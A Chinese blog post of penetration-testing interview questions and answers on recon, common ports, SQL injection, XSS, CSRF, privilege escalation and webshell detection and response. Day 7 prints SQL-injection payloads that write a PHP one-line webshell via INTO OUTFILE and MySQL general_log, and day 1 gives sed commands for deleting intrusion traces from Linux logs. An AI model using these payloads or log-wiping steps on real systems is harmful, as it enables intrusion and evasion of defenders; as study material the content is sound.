渗透测试面试题--日更(1-9day)

2023-11-05

day-one

1、拿到一个待检测的web站,渗透测试思路?

答:

(1)信息收集

  • 获取域名的whois信息,获取注册者的邮箱姓名电话等
    • 查服务器的旁站以及子域名站点,因为主站一般比较难,所以可以先看看旁站有没有通用cms或者其他漏洞
  • 查看服务器操作系统版本,web中间件,看看是否存在已知漏洞
  • 查看IP,进行IP地址的全面扫描,对响应端口进行漏洞探测

(2)漏洞扫描:开始检测漏洞,例如XSS,SQL注入,命令执行,越权访问,暴力破解…

(3)漏洞利用:利用扫描到的漏洞拿到webshell或者其他权限

(4)提权:提权服务器

(5)日志清理

(6)总结报告及修复方案

2、渗透测试中常见端口?

答:

image-20220320213221895

1)数据库类(扫描弱口令):

  • 1433 MSSQL

  • 1521 Oracle

  • 3306 Mysql

  • 5432 PostgreSQL

2)特殊服务类(未授权/命令 执行类/漏洞):

  • 443 SSL心脏滴血

  • 873 Rsync未授权

  • 5984 CouchDB

  • 6379 redis 未授权

  • 7001,7002WebLogic 默认弱口令,反序列

  • 11211 memcache 未授权访问

  • 27017,27018 Mongodb未授权访问

  • 50000SPA命令执行

  • 50070,50030 hadoop默认端口未授权访问

3、CDN加速是什么如何绕过找到真实IP

答:

1)多地ping

2)外国ping

3)查看IP和域名绑定的历史记录

4)查询子域名

4、简述Linux系统中查询日志方法

答:

登陆日志 last;

操作日志 history;

启动信息和错误日志 /var/log/message;

安全日志 /var/log/secure;

邮件日志/var/log/maillog;

计划任务日志/var/log/cron;

5、入侵Linux后需要清除哪些日志

答:

1)web日志如apache的access.log,error.log。直接将日志清除太明显,一般用sed进行定向清除:sed -i -e ‘/192.168.132.xx/d’

2)history命令的清除,也是对~/.bash_history进行定向清除

3)wtmp日志的清除,/var/log/wtmp

4)登陆日志清除 /var/log/secure

Day-two

1、什么是webshell?

答:webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称作为一种网页后门。

2、什么是网络钓鱼?

答:网络钓鱼是通过大量发送来自知名机构的欺骗性垃圾邮件,意图诱惑收信人给出敏感信息的一种攻击方式。它常引导用户到url与接口外观与真正网站几乎无差的假冒网站输入个人数据

3、什么是cc攻击?

答:cc攻击是DDos分布式拒绝服务的一种,正常请求伪造,服务器资源耗尽,相比其他的DDos攻击CC更具有技术含量一些。这种攻击你见不到真实源IP,见不到特别大的异常流量,但是造成服务器无法正常连接。

​ CC攻击的原理就是攻击者控制某些主机不停的发送大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。CC主要是用来攻击页面的。

4、web服务器被入侵后,怎么样进行排查?

答:最简单的就是

  • 查看web服务器的日志
  • 查看有没有异常端口开放
  • 使用安全狗等服务器安全软件清扫

5、蜜罐

答:蜜罐好比是情报收集系统,蜜罐仿佛是故意让人攻击的目标,引诱黑客前来攻击,所以攻击者入侵后,你就知道他是如何得逞的随时了解针对服务器发动的最新攻击和漏洞,还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。

DAY-3

1、Https的作用

答:(HTTP+SSL)

  • 内容加密建立一个信息安全通道,来保证数据传输的安全
  • 身份认证确认网站的真实性
  • 数据完整性防止内容被第三方冒充或者篡改

HTTP和HTTPS的区别

  • HTTPS协议需要用到CA申请证书
  • HTTP是超文本传输协议,信息是明文传输;HTTPS则是具有安全性的ssl加密传输协议
  • HTTP和HTTPS使用的是完全不同的连接方式,用的端口也不一样,前者是80.后者是443
  • HTTP的连接最简单是无状态的;HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议。

2、TCP和UDP的区别

答:TCP和UDP协议特性区别总结:

  • TCP协议可靠,UDP协议不可靠
  • TCP协议在传送数据段吗的时候要给段标号
  • TCP协议是面向连接;UDP协议采用无连接
  • TCP协议负载较高,采用虚电路;UDP协议采用无连接
  • TCP协议采用窗口技术和流控

当数据传输的性能必须让位于数据传输的完整性、可控制和可靠性时,TCP协议是最好的选择

当强调传输性能而不是传输的完整性时,例如:音频和多媒体应用,UDP是最好的选择

3、一个成熟并且相对安全的CMS,渗透时扫目录的意义?

答:

判断当前使用的CMS是否存在Nday,尝试利用公开的POC、EXP进行测试

根据CMS特征关联通CMS框架站点,进行敏感备份文件扫描,有可能获取站点备份文件,尝试从CMS源码进行代码审计,挖掘潜在漏洞

  • 敏感文件、二级目录扫描
  • 站长的误操作:网站备份的压缩文件,密码.txt,二级目录可能存放在其他站点

4、“人肉搜索”

答:是一种类比的称呼,主要是用来区别于传统搜索引擎。它主要是通过集中大众网民的力量去搜索信息和资源的一种方式,它包括利用互联网的机器搜索引擎及利用各个网民在日常生活中所能掌握的信息来进行收集信息的一种方式。

5、建立TCP连接的标准过程

答:

首先,请求端(客户端)发送一个包含 SYN 标志的 TCP 报文,SYN 即同步(Synchronize),同步报文会指明客户端使用的端口以及 TCP 连接的初始序号;

第二步,服务器在收到客户端的 SYN 报文后,将返回一个 SYN+ACK 的报文,表示客户端的请求被接受,同时 TCP 序号被加一,ACK 即确认
(Acknowledgement)。

第三步,客户端也返回一个确认报文 ACK 给服务器端,同样 TCP 序列号被加一,到此一个 TCP 连接完成。

以上的连接过程在 TCP 协议中被称为三次握手(Three-way Handshake)。
在这里插入图片描述

DAY–4

1、为什么进行子域名爆破?

答:子域名爆破可以发现更多目标,以参加渗透测试成功的可能性,探测到更多隐藏或遗忘的应用服务,这些应用往往导致一些严重漏洞。当一个主站坚不可摧的时候,我们可以尝试从分站入手。

2、信息收集如何处理子域名爆破的泛解析问题?

答:子域名爆破的泛解析:访问不存在的子域名任然会跳转,对应的返回值200

解决办法:根据确切不存在得子域名记录获取黑名单IP,对爆破过程进行黑名单过滤,但是这种宽泛得过滤任意导致漏报,所以可以将TTL也作为黑名单规则得一部分。在权威得DNS中,泛解析记录得TTL值是一样得,如果子域名记录相同但是TTL不同,即不是泛解析记录。

3、phpinfo你会关注哪些信息?

答:phpinfo()函数主要用于网站建设过程中测试搭建的PHP环境是否正确,很多网站在测试完毕后并没有及时删除,因此访问这些测试页面时,会输出服务器的关键信息,这些信息的泄露将导致服务器被渗透的风险。

  • 绝对路径(_SERVER[“SCRIPT_FILENAME”])
  • 支持的程序
  • 泄露真实IP:有时候通过phpinfo泄露的ip可以查查旁站,c段什么的,直接无视cdn。
  • 泄露缓存文件地址:容易getshell
  • 一些敏感的配置文件

4、过滤逗号的SQL注入如何绕过

答:

使用jion:
union select 1,2
=
union select * from (select 1)a jion(select 2)b

使用like:
select ascii(mid(user(),1,1))=80
=
select user() like 'r%'

5、过滤limit后的逗号如何绕过

答:

对于limit可以使用offset来绕过:
select * from news limit 0,1

=

select * from news limit 1 offset 0

DAY–5

1、简单描述一下什么是水平越权,什么是垂直越权,防范措施?

答:

**水平越权:**A和B拥有相同的权限的等级,他们能获取自己的个人数据,但是系统只验证了能访问数据的角色,而没有对数据做细分或者校验,导致A能访问到B的数据,这种行为称为水平越权。

**垂直越权:**A的用户权限高于B,B越权操作A的权限的情况叫做垂直越权。

防范措施:

  • 前后端同时对用户输入信息进行校验,双重验证机制
  • 调用功能前严重用户是否有权限调用相关功能
  • 执行关键操作前必须验证用户身份,验证用户是否具备操作数据的权限
  • 直接对象引用的加密资源ID,防止攻击者枚举ID,敏感信息特殊化处理
  • 对可控参数进行严格的检查和过滤

2、常见的内网段有哪些,他们的掩码是什么?

答:

局域网地址范围分三类,以下IP段为内网IP段:

C类:
192.168.0.0 - 192.168.255.255

B类:
172.16.0.0 - 172.31.255.255

A类:
10.0.0.0 - 10.255.255.25

一般的局域网用的IP地址就叫内网

3、了解一下CSRF?

答:csrf是跨站请求伪造,就是挟持了当前已经登陆的用户程序去做用户非本意的操作,比如说在用户已经登入淘宝的情况下,用户去点开了另一个恶意链接,然后恶意链接就是请求修改用户淘宝密码的,这种情况就是跨站请求伪造。

CSRF的防范:

  • 同源策略,检查referer字段,拒绝非本站的请求
  • 检查taken校验码,服务器生成的伪随机数发给用户,后台会拒绝掉错误的请求

SSRF和CSRF的区别:

CSRF是由客户端发起请求的安全漏洞

SSRF是由服务器端发起请求的安全漏洞

4、sql注入的原理、条件、种类和利用方式、防御?

答:

**原理:**web应用程序对用户输入的数据过滤不严谨,并且将输入数据当作SQL语句带入到数据中去执行。

**注入条件:**必须有参数传递;参数值带入数据库查询执行 and 1=1 返回正确 and 1=2 返回错误。

种类:

image-20220320213347261

防御:

1)严格限制web应用的数据库的操作权限,给连接数据库的用户提供满足需要的最低权限,最大限度的减少注入攻击对数据库的危害

2)对进入数据库的特殊字符进行转义处理或者编码转换

3)使用正则或者特殊字符判断参数的数据格式是否合法

5、mysql的网站注入。5.0以上和5.0以下有什么区别?

答:

5.0以下的没有information——schema这个系统表,无法列表名,只能暴力表名。

5.0以下是多用户单操作,5.0以上是多用户多操作。

DAY-6

1、常见的中间件漏洞?

答:

IIS:PUT漏洞,短文件名猜解,远程代码执行,解析漏洞

Apache:解析漏洞、目录遍历

Nginx:文件解析、目录遍历、CRLF注入、目录穿越

Tomcat:远程代码执行,war后门文件部署

JBoss:反序列化漏洞,war后门文件部署

WebLogic:反序列化漏洞、SSRF任意文件上传 war后门文件部署

2、提权?

答:

Windows常用的提权方法:

  • 系统内核溢出漏洞提权
  • 数据库提权
  • 错误的系统配置提权
  • web中间件漏洞提权
  • DLL劫持提权
  • 滥用高危权限令牌提权
  • 第三方软件/服务提权等

Linux提权方法:

  • linux内核漏洞提权
  • 低权限用户目录下可以被root权限用户调用的脚本提权(SUID)
  • 环境变量劫持高权限程序提权
  • sudoer配置文件错误提权

3、渗透测试的流程思路?

答:

  • 信息收集
  • 漏洞扫描
  • 漏洞利用
  • 提权
  • 日志清除
  • 总结报告及修复方案

4、文件上传怎么防护?

答:

文件上传原理:

在文件上传的功能处,若服务端脚本语言未对上传的文件进行严格验证和过滤,导致恶意用户上传恶意的脚本文件时,就有可能获取执行服务端命令的能力,这就是文件上传漏洞。存在文件上传得地方都有可能存在文件上传漏洞

防护文件上传:

  • 文件上传目录设为不可执行
  • 使用黑白名单结合的方式限制文件上传
  • 使用JS对文件的大小,扩展名进行检测
  • 使用取随机文件名,可以是md5也可以是时间。

5、XSS跨站脚本攻击?

答:xss跨站脚本攻击是对HTML代码的注入,是通过对网页注入浏览器可执行的代码而实现的攻击手段。

XSS分类:

  • 反射型

  • 存储型

  • DOM型

    反射型和存储型都需要经过服务器解析并且和数据库产生交互

    DOM型只需要经过前端解析,不需要和数据库产生交互

    存储型和DOM型都会长期将攻击代码存放在受害者服务器

    反射型只会反弹一次攻击代码

如何防范XSS攻击:

  • 过滤输入的数据,包括单引号,双引号,<,>等非法字符
  • 对输出到页面的数据进行相应的编码转换
  • 使用HTTP only属性保护终于cookie

DAY-7

1、PHP中有哪些危险函数?

答:

phpinfo()
输出PHP环境信息以及相关模块、web环境等信息

passthru()
允许执行一个外部程序并回显输出,类似exec()

exec()
允许执行一个外部程序(如unix shell或者cmd命令等)

system()
允许执行一个外部程序并回显输出

scandir()
列出指定路径中的文件和目录

erro_log()
将错误信息发送到指定位置
......

2、文件包含漏洞?

答:服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行。通过修改url地址或者一个参数的变量内容,读取到web根目录以前的其他文件,但不同于目录浏览,目录浏览是可以通过浏览器直接显示www目录下每一个文件的名称,把目录列表给列出来。

漏洞产生的原因:

文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。

文件包含函数:

require()
require_once()
include()
incluede_once()

include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个经过但程序继续正常允许;而require函数出现错误,会直接报错并退出程序执行
在这里插入图片描述

3、常见的状态码有哪些?

答:

  • 100(客户端继续发送请求,这是临时响应)
  • 101:服务器根据客户端请求切换协议
  • 200(成功):请求已成功,请求所希望的响应头或者数据体将随此响应返回
  • 202:服务器已经接收请求但未处理
  • 302:重定向
  • 404:请求资源不存在,是最常见的状态
  • 400:客户端有语法错误不能被服务器所理解
  • 401:请求未经授权
  • 403:服务器收到请求,但是拒绝提供服务
  • 500:服务器内部错误,是最常见的状态
  • 503:服务器当前不能处理客户端请求,一段时间后可恢复。

4、GET和POST的区别?

答:

  1. GET是不安全,因为在传输过程,数据被放在请求的url中;POST的所有操作对用户来说都是不可见的
  2. GET传送的数据量较小,这主要是因为受url长度限制;POST传送的数据量比较大,一般被默认认为不受限制
  3. get限制from表单的数据集的值必须为ASCII字符;post支持整个ISO字符集
  4. GET执行效率却比POST方法好,GET是from提交的默认方法。

5、sql注入写入webshell的条件?

答:

  • 有写入权限
  • 知道网站绝对路径
  • 允许导出文件

webshell的一些语句:

  1. union select写入

    outfile方法是mysql提供的一个用来写入文件的函数,当我们可以控制输入的文件和文件的保存路径时,就可以达到传入webshell的目的。

    union select '<?php eval($_POST[cmd])?>' into outfile'web目录'
    
  2. 分隔符写入

    当union无法使用时

    ?id=1 INTO OUTFILE '物理路径' lines terminated by (<?php eval($_POST[cmd])?>)#
    
    ?id=1 INTO OUTFILE '物理路径' fields terminated by (<?php eval($_POST[cmd])?>)#
    
    ?id=1 INTO OUTFILE '物理路径' columns terminated by (<?php eval($_POST[cmd])?>)#
    
    ?id=1 INTO OUTFILE '物理路径' lines starting by (<?php eval($_POST[cmd])?>)#
    
  3. log写入

    新版本的mysql在my.ini中设置了导出文件的路径,无法再使用select into outfile来写入一句话木马,这时我们可以通过修改MySQL的log文件来获取webshell。

    show variables like '%general%';                     #查看配置
    
    set global general_log = on;                         #开启general log模式
    
    set global general_log_file = '网站目录/shell.php';   #设置日志目录为shell地址
    
    select '<?php eval($_POST[shell]);?>'                #写入shell
    
    set global general_log=off;                          #关闭general log模式
    

DAY-8

1、设备出现了误报如何处置?

答:

要确认设备是否误报,应当先去查看设备的完整流量日志等信息。在hvv的过程中如果确实存在异常流量应当及时上报,确认是误报后做好事件记录。

2、如何区分是扫描流量还是手动流量?

答:

扫描的数据量大,请求流量有规律可循,手动流量请求少,间隔略长

3、Windows和Linux的日志文件放在哪里?

答:

  • Windows的系统日志:事件查看器

    Windows系统日志都是在“事件查看器下面”

  • Linux系统日志:/var/log

4、webshell检测思路

答:webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称作为一种网页后门。

静态检测:

静态检测通过匹配特征码,特征值,危险函数来查找webshell的方法,只能查找已知的webshell,并且误报率和漏报率会比较高,但是如果规则完善,可以降低误报率,但是漏报率必定会有所提高。

优点是快速方便,对已知的webshell查找准确率高,部署方便

缺点是漏报率、误报率高,无法查找0day型webshell,而且容易被绕过

日志检测:

使用webshell一般不会在日志中留下记录,但是会在网站的web日志中留下webshell页面的访问记录和数据提交记录。日志分析检测技术通过大量的日志文件建立请求模型从而检测出异常文件,称之为:HTTP异常请求模型检测。

语法检测:

实现关键危险函数的捕捉方式

防范webshell

  • 第一种的思路就是将专门上传文件的文件夹里面的脚本类型文件,解析成其他类型的文件,服务器不会以脚本类型执行它

  • 第二种匹配文件夹里面的脚本类型文件,将其设置为无法读取和操作

  • 第三种将文件上传到一个单独的文件夹,给一个二级域名,然后不给这个虚拟站点解析脚本的权限

5、webshell如何响应

答:PDCERF模型

Prepare(准备):准备用来检测的工具和人

Detection(检测):紧急事件监测:包括防火墙、系统、web服务器、IDS/WAF/SIEM中的日志,不正常或者是执行了越权操作的用户,甚至还有管理员的报告

Containment(抑制):首先控制受害范围,不要让攻击的影响继续蔓延到其他IT资产和业务环境,切记不要一股脑的投入全部经历到封堵后门。紧接着就是寻找根源,彻底解决,封堵攻击源

Eradication(根除)

Recover(恢复)

Follow-up(跟踪):根据各种监控去确定没有其他的攻击行为和攻击向量,紧接着就是开会反省此次事件,写报告,持续改进工作流程和工作环境。

DAY-9

1、Apache Log4j2的漏洞原理是什么?

答:

​ 由于Log4j2组件在处理程序日记记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获取目标服务器权限。

2、Windows和Linux的判断

答:

  • 大小写检测:Windows大小写不敏感,而Linux大小写敏感
  • Ping指令:根据TTL值,Windows一般情况下大于100,而Linux则小于100

3、无法连接服务器3389端口的几种情况

答:

  • 3389端口处于关闭状态
  • 远程桌面默认端口号被修改
  • 防火墙拦截
  • 处于内网环境
  • 超过了服务器最大连接数
  • 管理员设置了权限,指定用户才能通过3389端口进行远程桌面访问

4、为什么MYsql数据库的站点,无法连接

答:

  • 站库分离
  • 3306端口未对外开放
  • MYsql默认端口被修改

5、常见的逻辑漏洞

答:

  1. 支付订单:在支付订单时,可以篡改价格为任意金额;或者可以篡改运费或其他费用为负数,导致总金额减低
  2. 越权访问:通过越权漏洞访问他人信息或者操作他人账号
  3. 重置密码:在重置密码时,存在多种逻辑漏洞
  4. 竞争条件
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

渗透测试面试题--日更(1-9day) 的相关文章

  • 用户数据中的幸存者偏差

    幸存者偏差 Survivorship bias 是一种常见的逻辑谬误 意思是没有考虑到筛选的过程 忽略了被筛选掉的关键信息 只看到经过筛选后而产生的结果 先讲个故事 二战时 无奈德国空防强大 盟军战机损毁严重 于是军方便找来科学家统计飞机受
  • 通俗易懂,十分钟读懂DES,详解DES加密算法原理,DES攻击手段以及3DES原理

    文章目录 1 什么是DES 2 DES的基本概念 3 DES的加密流程 4 DES算法步骤详解 4 1 初始置换 Initial Permutation IP置换 4 2 加密轮次 4 3 F轮函数 4 3 1 拓展R到48位 4 3 2
  • python超详细基础文件操作【建议收藏】

    文章目录 前言 发现宝藏 1 文件操作 1 1 文件打开与关闭 1 1 1 打开文件 1 1 2 关闭文件 1 2 访问模式及说明 2 文件读写 2 1 写数据 write 2 2 读数据 read 2 3 读数据 readlines 2
  • 远程控制软件安全吗?一文看懂ToDesk、RayLink、TeamViewer、Splashtop相关安全机制_raylink todesk

    目录 一 前言 二 远程控制中的安全威胁 三 国内外远控软件安全机制 ToDesk RayLink Teamviewer Splashtop 四 安全远控预防 一 前言 近期 远程控制话题再一次引起关注 据相关新闻报道 不少不法分子利用远程
  • 基于java的饮食分享平台系统设计与实现

    基于java的饮食分享平台系统设计与实现 I 引言 A 研究背景和动机 近年来 随着人们生活水平的提高和健康意识的增强 饮食健康已经成为越来越多人的关注焦点 因此 一个方便快捷的饮食分享平台就显得尤为重要 基于Java的饮食分享平台系统设计
  • 电商数据api拼多多接口获取商品实时数据价格比价api代码演示案例

    拼多多商品详情接口 接口接入入口 它的主要功能是允许卖家从自己的系统中快速获取商品详细信息 通过这个接口 卖家可以提取到商品的各类数据 包括但不限于商品标题 价格 优惠价 收藏数 下单人数 月销售量等 此外 还可以获取到商品的SKU图 详情
  • 深入了解 Python MongoDB 查询:find 和 find_one 方法完全解析

    在 MongoDB 中 我们使用 find 和 find one 方法来在集合中查找数据 就像在MySQL数据库中使用 SELECT 语句来在表中查找数据一样 查找单个文档 要从MongoDB的集合中选择数据 我们可以使用 find one
  • 【计算机毕业设计】电影播放平台

    电影播放平台采用B S架构 数据库是MySQL 网站的搭建与开发采用了先进的java进行编写 使用了springboot框架 该系统从两个对象 由管理员和用户来对系统进行设计构建 主要功能包括 个人信息修改 对用户 电影分类 电影信息等功能
  • 【计算机毕业设计】北工国际健身俱乐部

    本系统为会员而设计制作北工国际健身俱乐部 旨在实现北工国际健身俱乐部智能化 现代化管理 本北工国际健身俱乐部管理自动化系统的开发和研制的最终目的是将北工国际健身俱乐部的运作模式从手工记录数据转变为网络信息查询管理 从而为现代管理人员的使用提
  • 【计算机毕业设计】springbootstone音乐播放器的设计与实现

    随着我国经济的高速发展与人们生活水平的日益提高 人们对生活质量的追求也多种多样 尤其在人们生活节奏不断加快的当下 人们更趋向于足不出户解决生活上的问题 stone音乐播放器展现了其蓬勃生命力和广阔的前景 与此同时 为解决用户需求 stone
  • 网络安全基础知识面试题库

    1 基于路由器的攻击手段 1 1 源IP地址欺骗式攻击 入侵者从外部传输一个伪装成来自内部主机的数据包 数据包的IP是 内网的合法IP 对策 丢弃所有来自路由器外端口 却使用内部源地址的数据包 1 2 源路由攻击 入侵者让数据包循着一个不可
  • 【计算机毕业设计】OA公文发文管理系统_xtv98

    近年来 人们的生活方式以网络为主题不断进化 OA公文发文管理就是其中的一部分 现在 无论是大型的还是小型的网站 都随处可见 不知不觉中已经成为我们生活中不可或缺的存在 随着社会的发展 除了对系统的需求外 我们还要促进经济发展 提高工作效率
  • 做测试不会 SQL?超详细的 SQL 查询语法教程来啦!

    前言 作为一名测试工程师 工作中在对测试结果进行数据比对的时候 或多或少要和数据库打交道的 要和数据库打交道 那么一些常用的sql查询语法必须要掌握 最近有部分做测试小伙伴表示sql查询不太会 问我有没有sql查询语法这一块的文档可以学习
  • Mysql中设置只允许指定ip能连接访问(可视化工具的方式)

    场景 Mysql中怎样设置指定ip远程访问连接 Mysql中怎样设置指定ip远程访问连接 navicat for mysql 设置只有某个ip可以远程链接 CSDN博客 前面设置root账户指定ip能连接访问是通过命令行的方式 如果通过可视
  • 你的服务器还安全吗?用户数据是否面临泄露风险?

    一系列严重的网络安全事件引起了广泛关注 多家知名公司的服务器遭到黑客挟持 用户的个人数据和敏感信息面临泄露的风险 这些事件揭示了网络安全的脆弱性和黑客攻击的威胁性 提醒着企业和个人加强对网络安全的重视 一 入侵案例 1 1 蔚来数据泄露 1
  • 内网安全:隧道技术详解

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一 CS反向连接上线 拿下Win2008 一 使用转发代理上线创建监听器 二 上传后门执行上线 隧道技术 SMB协议 SMB协议介绍
  • 【网络安全】——区块链安全和共识机制

    区块链安全和共识机制 摘要 区块链技术作为一种分布式去中心化的技术 在无需第三方的情况下 使得未建立信任的交易双方可以达成交易 因此 区块链技术近年来也在金融 医疗 能源等多个行业得到了快速发展 然而 区块链为无信任的网络提供保障的同时 也
  • 网络安全(黑客)自学启蒙

    一 什么是网络安全 网络安全是一种综合性的概念 涵盖了保护计算机系统 网络基础设施和数据免受未经授权的访问 攻击 损害或盗窃的一系列措施和技术 经常听到的 红队 渗透测试 等就是研究攻击技术 而 蓝队 安全运营 安全运维 则研究防御技术 作
  • 【安全】Java幂等性校验解决重复点击(6种实现方式)

    目录 一 简介 1 1 什么是幂等 1 2 为什么需要幂等性 1 3 接口超时 应该如何处理 1 4 幂等性对系统的影响 二 Restful API 接口的幂等性 三 实现方式 3 1 数据库层面 主键 唯一索引冲突 3 2 数据库层面 乐
  • 【安全】网络安全态势感知

    文章目录 一 态势感知简介 1 概念 2 形象举例 3 应具备的能力 二 为什么要态势感知 为什么网络安全态势感知很重要 三 态势感知系统的功能 四 如何评估态势感知的建设结果 五 什么是态势感知的三个层级 四 业界的态势感知产品 1 安全

随机推荐

  • (error) CROSSSLOT Keys in request don‘t hash to the same slot 解决方法

    Redis 哈希槽基本概念 哈希槽 hash slot 是来自Redis Cluster的概念 但在各种集群方案都有使用 哈希槽是一个key的集合 Redis集群共有16384个哈希槽 每个key通过CRC16散列然后对16384进行取模来
  • Python opencv 机器学习 5.knn pca降维 ocr识别数字 mnist数据集

    coding utf 8 from numpy import import numpy as np import struct import matplotlib pyplot as plt import operator 定义一个全局特征
  • 轻松获取在线媒体:视频下载工具推荐

    ytdl org youtube dl Stars 121 0k License Unlicense youtube dl 一个命令行程序 可以从YouTube com和其他视频网站下载视频 基于 Python 实现 你可以在Unix Wi
  • 上班之路 华为OD真题 200

    public class Main public static char map 地图 public static int t 转弯次数 public static int c 路障个数 public static int n 地图行数 p
  • Android 项目必备(十一)--> 轮询操作

    文章目录 前言 实战 前言 什么叫轮询请求 简单理解就是 App 端每隔一定的时间重复请求的操作就叫做轮询请求 比如 App 端每隔一段时间上报一次定位信息 App 端每隔一段时间拉去一次用户状态等 这些应该都是轮询请求 为何不用长连接代替
  • ibm服务器开机后显示器闪烁,IBM E50彩色显示器,开机后电源指示灯闪烁,机内有“咔嗒”声,黑屏...

    经观察发现 咔嗒 声是消磁继电器断开 闭合的声音 经测量 该继电器13V供电电压时有时无 该故障现象特别 不易判断 但从屏幕无显示这一故障现象入手 可初步判定故障范围可能在电源电路和行扫描电路 首先 不开机直观检查相关电路 未见异常 然后测
  • 由bibtex生成引用文献字符串

    word 文档写引用文献 用 mendeley 的插件生成的效果似乎一般 用法见 1 2 而且自己改格式的那个网页令人火大 可能我网速问题 用 python 写了个脚本 通过解析 bibtex 来生成 格式自编 项目页见 4 Code 目前
  • C++的函数_默认参数详解

    案例 int func int a int b 10 return a b int main func 10 return 0 注意事项 1 实现的函数中参数有默认参数 调用时如再传入 默认参数的值被替换为传入的值 func 10 20 r
  • vue报错

    启动vue项目时报如下错误 可是我的代码里并没有matched 后来才发现是路由引入错误 在 main js 文件中 上面的 import router from router 这个语句的前面 router 中的 R 必须的小写 不然就会出
  • 《substrate 快速入门与开发实战》

    视频地址 https www bilibili com video BV1C4411U7Rv substrate的升级过程 编写的runtime代码 gt 编译后 得到runtime的wasm二进制文件 gt 通过链上的治理模块发送升级ru
  • 关于nodejs中使用fluent-ffmpeg模块、ffmpeg工具的使用心得

    类人猿Blog 欢迎来到我的博客 您好 这是本人第一次写博客 请多多指教 nodejs中使用 fluent ffmpeg 详细方法和系统配置 适应于 windows和 linux 特别是在 redhat6 x中得以验证通过 简介 我们都知道
  • 对于c++中模板函数的一点体会

    何为模板函数 从字面上就可以看出来模板函数必须具备通用性 举个简单却很实用的例子 交换两个值的函数Swap 交换两个字符型void Swap char a char b 交换两个整型void Swap int a int b 交换两个浮点型
  • 【RabbitMQ教程】“Hello World”工作队列模式

    目录 前言 Hello World 工作队列模式介绍 消息模型 入门案例代码示例 自动ACK 消息确认机制 自动ACK存在的问题 演示手动ACK 前言 1 将 Hello World工作队列模式 单独抽出来细讲 目的是借助这个模式好好讲一下
  • PostgreSQL出现死锁该如何解决

    目录 什么是数据库死锁 定位死锁 死锁可能原因及解决办法 1 索引使用不当导致的死锁问题 2 不同事务之间的访问顺序问题 避免死锁的建议 附 数据库中常见的死锁原因与解决方案 总结 什么是数据库死锁 在操作系统领域当中 死锁指的是两个或者两
  • linux下飞鸽传书,ipmsg的安装(支持中文名文件传输,以及文件夹传输)

    一 下载 飞鸽 传书 http www ipmsg org archive g2ipmsg 0 9 5 tar gz 二 解压 tar zxvf g2ipmsg 0 9 5 tar gz cd g2ipmsg 0 9 5 三 修改参数 使它
  • linux 固定 ip 地址

    文章目录 查看当前ip 修改配置文件 查看当前ip ip addr ifconfig 修改配置文件 vim etc sysconfig network scripts ifcfg ens33 原来是这样的 TYPE Ethernet PRO
  • 软件测试-面试题

    1 什么是需求文档测试 测试需求中是否存在逻辑矛盾以及需求在技术上是否可以实现 2 什么是设计文档测试 测试设计是否符合全部需求以及设计是否合理 3 什么是 测试 Alpha测试 测试 是由一个用户在开发环境下进行的测试 也可以是公司内部的
  • SpringBoot 集成Redisson 提示:java.lang.ClassNotFoundException: **.redis.connection.ReactiveRedisConnec

    SpringBoot 集成Redisson 提示如下错误信息 Caused by java lang ClassNotFoundException org springframework data redis connection Reac
  • Vue安装less报错

    使用npm安装less 指定版本为5 npm install save less less loader 5 报错 npm ERR code ERESOLVE npm ERR ERESOLVE unable to resolve depen
  • 渗透测试面试题--日更(1-9day)

    day one 1 拿到一个待检测的web站 渗透测试思路 答 1 信息收集 获取域名的whois信息 获取注册者的邮箱姓名电话等 查服务器的旁站以及子域名站点 因为主站一般比较难 所以可以先看看旁站有没有通用cms或者其他漏洞 查看服务器